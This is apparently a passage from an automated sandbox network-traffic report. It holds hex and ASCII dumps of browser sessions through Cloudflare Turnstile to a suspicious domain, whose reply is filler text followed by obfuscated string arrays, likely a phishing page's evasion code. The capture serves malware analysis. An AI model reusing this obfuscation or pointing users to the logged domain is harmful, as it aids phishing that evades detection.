                                                                                                                  2024-10-22 14:08:31 UTC16384OUTData Raw: 77 78 2b 2d 41 4c 44 57 30 48 4d 75 76 52 24 69 51 75 59 63 59 76 6a 76 37 70 36 66 61 6d 53 65 76 68 74 6e 50 35 4a 76 43 76 73 6d 24 55 76 33 76 6e 52 76 53 76 6f 24 43 24 76 69 76 6c 2d 61 48 6e 47 76 50 6d 53 76 76 72 76 5a 24 61 59 76 46 76 56 24 4d 6d 6e 50 76 2d 70 48 70 76 48 55 76 59 48 67 4d 74 76 48 76 6a 49 69 65 52 73 24 61 70 4d 24 76 66 48 7a 6f 55 68 76 56 76 79 6f 6a 67 4d 32 76 56 6f 55 67 4d 4b 76 64 44 70 76 6f 4e 76 6f 5a 4b 2d 4d 36 76 74 6f 55 53 7a 68 74 43 38 53 67 76 2b 76 4d 4f 70 69 24 44 69 76 76 4d 65 72 71 76 48 6a 44 74 30 79 6a 2d 76 69 24 6e 52 53 48 55 6c 67 49 65 63 48 55 66 4d 59 24 6f 56 24 69 24 47 7a 4d 48 63 6a 76 75 24 6f 59 63 47 4d 53 53 63 48 55 36 76 6a 59 76 24 53 7a 76 54 24 72 65 53 64 52 74 24 72 48 63 73
                                                                                                                  Data Ascii: wx+-ALDW0HMuvR$iQuYcYvjv7p6famSevhtnP5JvCvsm$Uv3vnRvSvo$C$vivl-aHnGvPmSvvrvZ$aYvFvV$MmnPv-pHpvHUvYHgMtvHvjIieRs$apM$vfHzoUhvVvyojgM2vVoUgMKvdDpvoNvoZK-M6vtoUSzhtC8Sgv+vMOpi$DivvMerqvHjDt0yj-vi$nRSHUlgIecHUfMY$oV$i$GzMHcjvu$oYcGMSScHU6vjYv$SzvT$reSdRt$rHcs
                                                                                                                  2024-10-22 14:08:31 UTC2245OUTData Raw: 50 6b 76 71 42 37 50 62 4d 55 54 55 76 76 71 76 47 64 6a 30 76 54 76 78 31 75 52 67 6f 41 44 44 35 64 53 32 79 41 6f 6e 59 53 4b 4a 46 24 53 2b 4a 75 76 4e 44 69 70 4d 47 76 56 52 6e 39 5a 2b 76 42 48 53 59 6e 52 32 56 76 53 52 4d 35 24 36 52 31 59 76 4b 6f 77 48 73 75 67 4e 48 72 76 48 59 53 59 6f 53 78 69 64 71 70 72 50 70 41 42 36 6f 59 4b 6f 53 70 76 54 76 78 42 4c 35 44 4a 7a 59 6c 61 69 4d 47 6f 4b 6f 53 44 44 73 24 44 24 41 55 7a 77 43 72 78 72 35 41 24 50 50 76 6e 64 62 6e 4a 2b 6a 31 49 2d 77 24 73 24 31 59 6e 46 4f 41 6c 49 70 2b 56 76 57 6b 4e 35 7a 6b 76 64 24 31 6b 70 6d 77 44 44 34 53 4f 45 4b 76 44 34 64 6e 5a 76 6e 73 50 24 76 57 53 41 65 6e 59 44 5a 76 6f 24 71 45 50 66 32 30 4e 35 64 4d 33 76 59 7a 75 56 6a 4e 79 31 52 41 49 4d 4c 4b 55
                                                                                                                  Data Ascii: PkvqB7PbMUTUvvqvGdj0vTvx1uRgoADD5dS2yAonYSKJF$S+JuvNDipMGvVRn9Z+vBHSYnR2VvSRM5$6R1YvKowHsugNHrvHYSYoSxidqprPpAB6oYKoSpvTvxBL5DJzYlaiMGoKoSDDs$D$AUzwCrxr5A$PPvndbnJ+j1I-w$s$1YnFOAlIp+VvWkN5zkvd$1kpmwDD4SOEKvD4dnZvnsP$vWSAenYDZvo$qEPf20N5dM3vYzuVjNy1RAIMLKU
                                                                                                                  2024-10-22 14:08:32 UTC135INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 4552
                                                                                                                  Connection: close
                                                                                                                  2024-10-22 14:08:32 UTC1530INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 4b 61 6a 39 31 41 52 47 32 65 62 51 62 61 2b 46 38 6d 71 67 4b 52 68 66 77 64 6c 49 56 55 2b 2f 2b 69 64 2f 71 75 32 48 4e 4c 4d 72 52 42 68 66 73 42 51 31 78 4d 67 2b 33 70 75 65 36 2b 37 49 38 68 69 4d 4a 43 6a 72 4e 58 56 67 38 78 4d 57 4e 36 47 4c 43 77 65 4f 65 36 6b 79 57 47 4b 31 78 70 6a 39 42 47 69 49 38 34 74 6b 2f 46 2f 53 72 37 75 33 39 64 77 74 2f 43 5a 4a 65 47 33 61 58 35 5a 72 48 6c 70 4f 38 33 4b 48 52 67 59 68 77 4e 5a 33 6f 78 6c 53 6f 74 35 42 6e 51 42 4b 34 50 63 42 35 69 38 30 72 63 42 77 6b 76 51 68 7a 34 70 37 36 78 33 62 58 30 71 38 32 53 62 6b 39 36 61 54 74 58 34 4b 75 34 44 30 56 47 42 47 64 33 37 49 7a 4c 68 6b 4e 75 67 72 54 42 4b 6a 44 61 34 4e 57 79 4d 42 6b 33 45 62 45 2b 34 6e 62
                                                                                                                  Data Ascii: cf-chl-out-s: Kaj91ARG2ebQba+F8mqgKRhfwdlIVU+/+id/qu2HNLMrRBhfsBQ1xMg+3pue6+7I8hiMJCjrNXVg8xMWN6GLCweOe6kyWGK1xpj9BGiI84tk/F/Sr7u39dwt/CZJeG3aX5ZrHlpO83KHRgYhwNZ3oxlSot5BnQBK4PcB5i80rcBwkvQhz4p76x3bX0q82Sbk96aTtX4Ku4D0VGBGd37IzLhkNugrTBKjDa4NWyMBk3EbE+4nb
                                                                                                                  2024-10-22 14:08:32 UTC1073INData Raw: 6c 71 2b 51 74 4a 32 6e 6d 4a 2b 6e 77 4a 69 68 72 61 2b 38 76 71 69 4f 31 5a 53 72 79 38 58 59 72 64 2b 57 6d 72 47 68 6f 4e 4f 69 70 71 58 54 6f 4e 58 48 75 4f 7a 70 34 65 33 4d 38 63 76 71 78 2f 58 50 37 73 6e 55 31 39 6a 4f 79 66 48 41 31 67 50 69 32 76 33 46 31 76 48 41 33 39 72 6a 44 4f 55 4e 36 42 45 4f 2f 52 4c 30 38 63 34 4c 36 65 54 57 44 76 49 66 44 66 59 59 44 51 4d 47 49 2b 55 52 42 69 76 70 46 51 6b 42 35 76 66 72 42 53 54 71 49 41 59 6e 47 44 55 4c 42 76 62 38 45 7a 38 35 46 7a 73 39 48 79 5a 46 4d 52 4d 44 53 77 6f 72 47 67 55 50 48 79 68 52 54 68 78 53 4e 54 45 54 46 79 31 4c 4d 42 31 62 50 6b 38 74 4c 6a 64 4e 4f 6a 6b 66 49 68 38 30 57 53 64 48 49 47 56 72 4c 47 49 75 5a 43 77 73 55 6d 63 72 5a 55 67 31 54 58 70 52 67 45 6c 61 59 6a 74
                                                                                                                  Data Ascii: lq+QtJ2nmJ+nwJihra+8vqiO1ZSry8XYrd+WmrGhoNOipqXToNXHuOzp4e3M8cvqx/XP7snU19jOyfHA1gPi2v3F1vHA39rjDOUN6BEO/RL08c4L6eTWDvIfDfYYDQMGI+URBivpFQkB5vfrBSTqIAYnGDULBvb8Ez85Fzs9HyZFMRMDSworGgUPHyhRThxSNTETFy1LMB1bPk8tLjdNOjkfIh80WSdHIGVrLGIuZCwsUmcrZUg1TXpRgElaYjt
                                                                                                                  2024-10-22 14:08:32 UTC1369INData Raw: 4d 4f 73 71 61 2f 66 73 4f 6d 73 34 37 48 44 71 76 62 72 33 4d 61 76 37 39 36 39 32 65 2f 6a 76 4e 76 33 38 77 6e 65 36 64 73 4d 77 2f 66 2b 32 64 44 49 36 4e 2f 70 30 65 33 52 42 64 67 57 31 52 6b 49 36 39 30 63 45 41 51 6c 35 52 51 6e 36 42 62 6f 43 75 67 45 2f 51 4c 6d 49 44 41 56 4e 50 51 73 45 65 34 32 43 69 33 37 2f 50 55 55 2f 44 42 41 39 51 37 37 51 43 67 4a 41 44 68 48 42 67 34 65 4d 51 34 6d 51 46 51 52 46 69 59 54 57 6a 45 7a 4b 42 31 4b 4f 6a 68 67 58 6c 41 37 49 78 68 55 49 47 6c 42 52 6b 52 75 61 55 5a 78 63 6d 42 77 55 79 35 30 4e 57 31 45 5a 30 70 5a 4f 7a 52 61 64 7a 31 2b 62 48 30 39 63 33 68 7a 52 34 68 34 59 45 78 45 57 6f 4a 50 66 58 31 66 55 35 4e 79 56 47 52 51 65 70 64 6f 56 48 61 68 58 6f 78 68 6b 46 31 2b 70 4a 39 6a 6c 6e 71 6e
                                                                                                                  Data Ascii: MOsqa/fsOms47HDqvbr3Mav79692e/jvNv38wne6dsMw/f+2dDI6N/p0e3RBdgW1RkI690cEAQl5RQn6BboCugE/QLmIDAVNPQsEe42Ci37/PUU/DBA9Q77QCgJADhHBg4eMQ4mQFQRFiYTWjEzKB1KOjhgXlA7IxhUIGlBRkRuaUZxcmBwUy50NW1EZ0pZOzRadz1+bH09c3hzR4h4YExEWoJPfX1fU5NyVGRQepdoVHahXoxhkF1+pJ9jlnqn
                                                                                                                  2024-10-22 14:08:32 UTC1369INData Raw: 71 75 34 2f 66 4e 36 4c 4c 50 74 2b 72 51 79 50 48 77 30 39 44 75 42 64 34 42 77 67 67 43 41 41 72 4d 2b 73 7a 70 79 65 6b 51 36 51 58 4f 36 39 4d 48 37 4f 51 4f 44 66 41 62 43 79 45 44 46 68 49 53 37 53 51 55 47 67 6a 70 46 78 63 4e 35 69 45 52 37 77 41 69 49 77 67 31 46 42 55 6e 4c 65 30 4d 43 69 30 67 49 53 48 35 47 76 30 45 4e 68 59 62 4b 41 63 69 4a 67 59 59 4f 45 49 66 4c 79 55 6d 4e 78 45 34 51 79 6f 70 48 42 70 48 55 78 4a 58 58 46 55 76 56 56 31 41 4f 32 63 70 61 44 68 56 51 69 5a 6d 51 55 73 72 52 55 4e 56 64 6d 68 44 5a 31 59 7a 55 7a 64 6e 54 6b 45 2b 50 46 78 33 5a 6e 4e 6f 66 59 46 56 64 58 36 46 65 6d 65 47 63 32 31 39 68 32 64 68 64 34 75 52 6a 33 75 4f 5a 70 6c 64 63 33 75 57 6b 6f 52 75 6c 6f 69 56 64 32 71 42 5a 6d 79 75 66 6f 47 50 61
                                                                                                                  Data Ascii: qu4/fN6LLPt+rQyPHw09DuBd4BwggCAArM+szpyekQ6QXO69MH7OQODfAbCyEDFhIS7SQUGgjpFxcN5iER7wAiIwg1FBUnLe0MCi0gISH5Gv0ENhYbKAciJgYYOEIfLyUmNxE4QyopHBpHUxJXXFUvVV1AO2cpaDhVQiZmQUsrRUNVdmhDZ1YzUzdnTkE+PFx3ZnNofYFVdX6FemeGc219h2dhd4uRj3uOZpldc3uWkoRuloiVd2qBZmyufoGPa
                                                                                                                  2024-10-22 14:08:32 UTC741INData Raw: 78 7a 74 71 31 36 65 72 68 75 63 4c 5a 35 65 50 6b 43 4f 66 38 79 75 7a 73 41 75 73 44 37 63 72 6e 41 2f 58 79 31 76 6a 33 2b 42 6f 48 2b 2b 72 62 32 77 33 66 46 39 30 4f 47 4f 49 45 41 76 66 71 47 69 6f 4c 41 65 38 51 41 53 34 47 49 67 51 52 36 52 51 4d 49 2f 55 6d 4d 42 41 79 4b 6a 73 51 45 6a 38 69 4e 68 30 68 46 6b 6f 57 4f 51 63 48 44 79 73 4c 48 46 46 50 53 69 67 6b 56 52 68 53 46 31 6c 58 4d 46 4a 62 51 44 78 45 54 52 31 6d 5a 55 6f 35 50 47 52 59 4a 6a 30 71 54 32 70 55 55 33 46 71 59 6a 68 52 62 47 70 78 65 6e 4e 36 56 33 31 31 66 6b 31 6d 5a 47 46 44 59 55 46 6f 59 58 6d 41 68 6f 68 37 69 32 47 55 62 6b 39 34 61 34 47 50 55 35 47 47 61 6f 36 63 67 4a 56 77 6b 34 4a 7a 6c 56 36 53 6e 70 74 6e 6a 58 6c 76 6d 5a 70 72 73 71 36 78 62 72 5a 30 6c 33
                                                                                                                  Data Ascii: xztq16erhucLZ5ePkCOf8yuzsAusD7crnA/Xy1vj3+BoH++rb2w3fF90OGOIEAvfqGioLAe8QAS4GIgQR6RQMI/UmMBAyKjsQEj8iNh0hFkoWOQcHDysLHFFPSigkVRhSF1lXMFJbQDxETR1mZUo5PGRYJj0qT2pUU3FqYjhRbGpxenN6V311fk1mZGFDYUFoYXmAhoh7i2GUbk94a4GPU5GGao6cgJVwk4JzlV6SnptnjXlvmZprsq6xbrZ0l3


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.1649751104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:32 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:32 UTC379INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:32 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 7
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  cf-chl-out: gXJh9Me7KkItrOuJpVCmKg4Rz9BQoHH8whM=$UupRKa6ir+sGWk5j
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f5d3d0f6c80-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:32 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                  Data Ascii: invalid


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.1649753188.114.97.34432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:33 UTC912OUTPOST /yKKWd/ HTTP/1.1
                                                                                                                  Host: apeidieppe-d.basiic.net
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 880
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/yKKWd/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: PHPSESSID=4ghhpb396a5ubs4qoebu2iv728
                                                                                                                  2024-10-22 14:08:33 UTC880OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 4c 38 39 48 47 69 61 6c 61 4d 2d 5a 4a 6b 5a 37 39 6c 49 77 6b 4a 6f 45 30 4d 30 5f 71 4f 65 75 2d 4f 74 46 74 79 5f 79 67 52 6c 52 68 2d 4e 5a 41 75 48 71 68 6c 64 43 38 7a 74 47 73 31 6b 4d 57 35 70 7a 50 5f 78 68 5f 74 76 79 41 53 4e 55 6e 59 53 54 6b 65 63 63 77 6a 4c 57 32 62 52 31 6f 45 68 64 46 66 36 37 69 2d 6f 6f 65 50 4a 69 78 31 74 4f 79 33 53 71 32 76 38 33 71 63 72 76 4b 31 75 6f 35 45 61 32 5a 69 64 76 30 34 6e 6a 78 2d 34 73 35 65 70 78 70 62 54 67 68 78 44 72 71 45 31 51 64 4b 62 38 47 38 34 77 4c 6a 4b 66 6e 38 39 48 75 63 59 5f 76 77 73 49 34 44 38 54 58 52 45 4e 32 54 6a 32 38 46 44 67 31 54 65 57 35 64 68 54 62 74 6b 74 75 4a 5f 35 6d 73 30 72 32 67 62 50 66 6a 78
                                                                                                                  Data Ascii: cf-turnstile-response=0.L89HGialaM-ZJkZ79lIwkJoE0M0_qOeu-OtFty_ygRlRh-NZAuHqhldC8ztGs1kMW5pzP_xh_tvyASNUnYSTkeccwjLW2bR1oEhdFf67i-ooePJix1tOy3Sq2v83qcrvK1uo5Ea2Zidv04njx-4s5epxpbTghxDrqE1QdKb8G84wLjKfn89HucY_vwsI4D8TXREN2Tj28FDg1TeW5dhTbtktuJ_5ms0r2gbPfjx
                                                                                                                  2024-10-22 14:08:34 UTC911INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-Powered-By: PHP/8.0.30
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TmHQojA0ycPLQ1QdIT0jj2Sg0fKaCasMnohGtaZPUAvqaN4U5ELVYgr5ymYBReGs3tdWuoWrRFknyeW%2F12GxYb2QPrKB%2Fp7yzVcVJNyc3jvugcBIDINjqVehhFcg9D1s0DVPH5XJbiUKJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f611a14475c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2392&delivery_rate=2496551&cwnd=251&unsent_bytes=0&cid=c9b7ebae87c7ccce&ts=763&x=0"
                                                                                                                  2024-10-22 14:08:34 UTC458INData Raw: 33 37 32 33 0d 0a 3c 21 2d 2d 20 3c 73 70 61 6e 3e 4c 61 62 6f 72 65 20 70 6f 72 6b 20 6c 6f 69 6e 20 6b 65 76 69 6e 20 72 75 6d 70 20 73 68 6f 72 74 20 72 69 62 73 2e 20 45 78 63 65 70 74 65 75 72 20 70 6f 72 6b 20 63 68 6f 70 20 74 61 69 6c 20 61 6c 63 61 74 72 61 20 6d 6f 6c 6c 69 74 2c 20 70 69 67 20 63 75 70 69 64 61 74 61 74 20 65 69 75 73 6d 6f 64 20 74 75 72 6b 65 79 2e 20 53 61 6c 61 6d 69 20 73 65 64 20 76 6f 6c 75 70 74 61 74 65 20 73 68 6f 72 74 20 6c 6f 69 6e 20 68 61 6d 62 75 72 67 65 72 20 62 6f 75 64 69 6e 20 61 6e 69 6d 20 6e 6f 73 74 72 75 64 2e 20 43 68 75 63 6b 20 74 6f 6e 67 75 65 20 76 6f 6c 75 70 74 61 74 65 20 65 78 65 72 63 69 74 61 74 69 6f 6e 20 73 68 6f 72 74 20 6c 6f 69 6e 20 62 72 69 73 6b 65 74 2e 20 42 75 72 67 64 6f 67 67
                                                                                                                  Data Ascii: 3723... <span>Labore pork loin kevin rump short ribs. Excepteur pork chop tail alcatra mollit, pig cupidatat eiusmod turkey. Salami sed voluptate short loin hamburger boudin anim nostrud. Chuck tongue voluptate exercitation short loin brisket. Burgdogg
                                                                                                                  2024-10-22 14:08:34 UTC1369INData Raw: 69 70 73 75 6d 20 73 68 61 6e 6b 20 6e 6f 73 74 72 75 64 2e 20 43 61 70 69 63 6f 6c 61 20 69 6e 20 6c 61 62 6f 72 65 20 61 6e 64 6f 75 69 6c 6c 65 20 65 6e 69 6d 20 64 72 75 6d 73 74 69 63 6b 2c 20 62 65 65 66 20 72 69 62 73 20 72 75 6d 70 20 70 61 6e 63 65 74 74 61 20 73 61 6c 61 6d 69 20 65 61 2e 20 55 6c 6c 61 6d 63 6f 20 65 78 65 72 63 69 74 61 74 69 6f 6e 20 74 61 69 6c 20 61 6c 69 71 75 69 70 20 70 61 73 74 72 61 6d 69 20 75 74 2e 20 43 68 69 63 6b 65 6e 20 62 65 65 66 20 6e 6f 73 74 72 75 64 20 70 6f 72 63 68 65 74 74 61 20 76 6f 6c 75 70 74 61 74 65 20 70 61 73 74 72 61 6d 69 20 73 74 72 69 70 20 73 74 65 61 6b 2e 20 54 75 72 64 75 63 6b 65 6e 20 6d 61 67 6e 61 20 68 61 6d 62 75 72 67 65 72 20 64 72 75 6d 73 74 69 63 6b 2e 20 4a 6f 77 6c 20 63 61
                                                                                                                  Data Ascii: ipsum shank nostrud. Capicola in labore andouille enim drumstick, beef ribs rump pancetta salami ea. Ullamco exercitation tail aliquip pastrami ut. Chicken beef nostrud porchetta voluptate pastrami strip steak. Turducken magna hamburger drumstick. Jowl ca
                                                                                                                  2024-10-22 14:08:34 UTC1369INData Raw: 72 20 65 78 20 73 75 6e 74 20 6c 61 62 6f 72 69 73 20 65 73 74 20 6a 6f 77 6c 20 63 69 6c 6c 75 6d 2e 20 43 75 6c 70 61 20 64 75 69 73 20 73 69 72 6c 6f 69 6e 20 61 6e 64 6f 75 69 6c 6c 65 20 61 6c 63 61 74 72 61 2e 20 45 61 20 62 6f 75 64 69 6e 20 64 75 69 73 20 63 6f 6e 73 65 63 74 65 74 75 72 20 70 6f 72 6b 20 63 68 6f 70 20 73 68 6f 72 74 20 72 69 62 73 20 6c 65 62 65 72 6b 61 73 20 64 72 75 6d 73 74 69 63 6b 20 61 6c 69 71 75 61 20 6d 65 61 74 62 61 6c 6c 20 70 6f 72 6b 20 73 70 61 72 65 20 72 69 62 73 20 62 65 65 66 20 72 69 62 73 2e 20 46 69 6c 65 74 20 6d 69 67 6e 6f 6e 20 62 75 72 67 64 6f 67 67 65 6e 20 6e 69 73 69 20 70 6f 72 6b 20 69 6e 20 61 6c 69 71 75 61 20 65 61 20 63 6f 6d 6d 6f 64 6f 20 61 6c 69 71 75 69 70 20 74 75 72 64 75 63 6b 65 6e
                                                                                                                  Data Ascii: r ex sunt laboris est jowl cillum. Culpa duis sirloin andouille alcatra. Ea boudin duis consectetur pork chop short ribs leberkas drumstick aliqua meatball pork spare ribs beef ribs. Filet mignon burgdoggen nisi pork in aliqua ea commodo aliquip turducken
                                                                                                                  2024-10-22 14:08:34 UTC1369INData Raw: 55 6c 78 62 31 7a 64 74 27 2c 27 71 71 3c 78 6d 45 3b 7b 27 2c 27 71 71 3c 78 6d 45 62 38 39 6c 27 2c 27 71 71 3c 78 6d 45 67 21 53 3d 79 5d 7b 27 2c 27 73 48 26 4e 6e 27 2c 27 35 53 5e 3e 40 27 2c 27 2a 3e 70 56 54 52 73 64 74 27 2c 27 50 32 3e 56 24 78 35 6b 27 2c 27 68 39 47 41 64 45 57 38 74 27 2c 27 78 24 6c 78 78 7c 43 6b 27 2c 27 77 74 31 6d 57 21 66 6b 27 2c 27 56 3e 3e 56 33 2b 42 27 2c 27 2a 3e 47 41 7e 2b 42 27 2c 27 28 3e 3c 78 55 38 42 27 2c 27 30 45 60 56 5d 44 21 54 53 40 32 27 2c 27 23 5f 7a 6d 37 38 25 38 3f 29 4d 65 44 70 51 7e 30 7b 27 2c 27 23 5f 7a 6d 37 38 6c 6b 27 2c 27 24 41 76 6d 33 38 7a 6b 27 2c 27 22 48 6c 78 43 45 34 2f 2f 22 2b 34 7b 27 2c 27 24 29 3e 69 5b 44 21 54 53 40 32 27 2c 27 64 2e 26 4e 65 52 44 64 53 3d 45 5d 7b 27
                                                                                                                  Data Ascii: Ulxb1zdt','qq<xmE;{','qq<xmEb89l','qq<xmEg!S=y]{','sH&Nn','5S^>@','*>pVTRsdt','P2>V$x5k','h9GAdEW8t','x$lxx|Ck','wt1mW!fk','V>>V3+B','*>GA~+B','(><xU8B','0E`V]D!TS@2','#_zm78%8?)MeDpQ~0{','#_zm78lk','$Avm38zk','"HlxCE4//"+4{','$)>i[D!TS@2','d.&NeRDdS=E]{'
                                                                                                                  2024-10-22 14:08:34 UTC1369INData Raw: 70 4a 74 73 28 52 2e 2e 56 6c 64 67 74 40 6f 46 46 53 72 2b 79 7b 53 40 65 30 73 2e 3f 46 7c 42 27 2c 27 4e 52 5f 65 7c 76 76 28 44 2e 27 2c 27 47 48 79 6d 4e 5a 59 2b 41 22 30 74 46 50 66 7e 31 29 5d 3e 5d 44 5d 7b 27 2c 27 33 3e 62 56 78 6f 4e 3c 60 73 66 21 2a 2e 61 70 29 30 54 4e 74 4b 4f 60 54 61 29 24 60 6b 27 2c 27 55 51 32 74 43 38 36 32 48 40 5e 4c 40 5f 41 27 2c 27 25 24 3a 4a 49 47 69 35 47 51 39 3b 3d 24 44 7e 27 2c 27 4f 2e 2e 3c 3a 29 2b 32 5a 2c 38 2e 54 73 52 6e 41 4f 3e 69 7d 78 49 38 59 41 4c 38 3e 34 3a 4f 52 75 41 74 3d 28 5a 35 3a 40 27 2c 27 7d 53 29 6d 53 7d 74 7a 4a 29 3d 71 6a 6b 6e 28 45 42 27 2c 27 6c 3e 68 66 7a 38 29 52 5a 2c 2a 3a 5f 67 40 37 40 6e 69 31 71 4d 72 6b 2a 69 7b 4f 4d 50 45 46 57 3e 41 64 57 3c 35 38 52 29 43 4b
                                                                                                                  Data Ascii: pJts(R..Vldgt@oFFSr+y{S@e0s.?F|B','NR_e|vv(D.','GHymNZY+A"0tFPf~1)]>]D]{','3>bVxoN<`sf!*.ap)0TNtKO`Ta)$`k','UQ2tC862H@^L@_A','%$:JIGi5GQ9;=$D~','O..<:)+2Z,8.TsRnAO>i}xI8YAL8>4:ORuAt=(Z5:@','}S)mS}tzJ)=qjkn(EB','l>hfz8)RZ,*:_g@7@ni1qMrk*i{OMPEFW>AdW<58R)CK
                                                                                                                  2024-10-22 14:08:34 UTC1369INData Raw: 35 31 24 56 4b 70 6e 62 30 53 77 4c 4a 67 28 3c 58 6e 6c 31 36 72 4f 41 27 2c 27 45 77 53 59 46 76 75 54 44 32 54 62 40 6e 24 60 53 6e 4b 43 38 32 3c 58 2a 69 43 47 60 6f 5e 37 68 6c 39 70 28 58 42 27 2c 27 5d 22 61 47 63 2b 55 5b 60 41 22 7b 5d 71 27 2c 27 46 52 7b 53 73 78 42 27 2c 27 5f 59 43 65 79 44 50 69 4c 40 51 3e 78 71 56 39 43 4f 7a 5a 7a 49 26 54 49 41 4a 5a 7a 76 56 64 3b 42 27 2c 27 51 4f 5e 3e 7a 49 76 6b 59 2f 52 38 6e 6e 65 61 39 29 2f 78 78 66 2c 3c 62 53 3a 43 3e 7d 28 6d 3d 58 74 65 54 44 32 54 78 2c 33 27 2c 27 49 49 39 47 42 63 6b 64 25 75 6f 4d 30 6e 30 43 4b 62 78 45 31 28 6d 5b 39 5f 5a 7b 28 45 36 64 36 22 48 27 2c 27 5b 3e 49 66 63 2b 2b 54 3c 41 2e 51 48 76 4b 7e 45 29 25 69 31 44 50 7a 60 41 71 4b 55 48 26 70 66 42 27 2c 27 62
                                                                                                                  Data Ascii: 51$VKpnb0SwLJg(<Xnl16rOA','EwSYFvuTD2Tb@n$`SnKC82<X*iCG`o^7hl9p(XB',']"aGc+U[`A"{]q','FR{SsxB','_YCeyDPiL@Q>xqV9COzZzI&TIAJZzvVd;B','QO^>zIvkY/R8nnea9)/xxf,<bS:C>}(m=XteTD2Tx,3','II9GBckd%uoM0n0CKbxE1(m[9_Z{(E6d6"H','[>Ifc++T<A.QHvK~E)%i1DPz`AqKUH&pfB','b
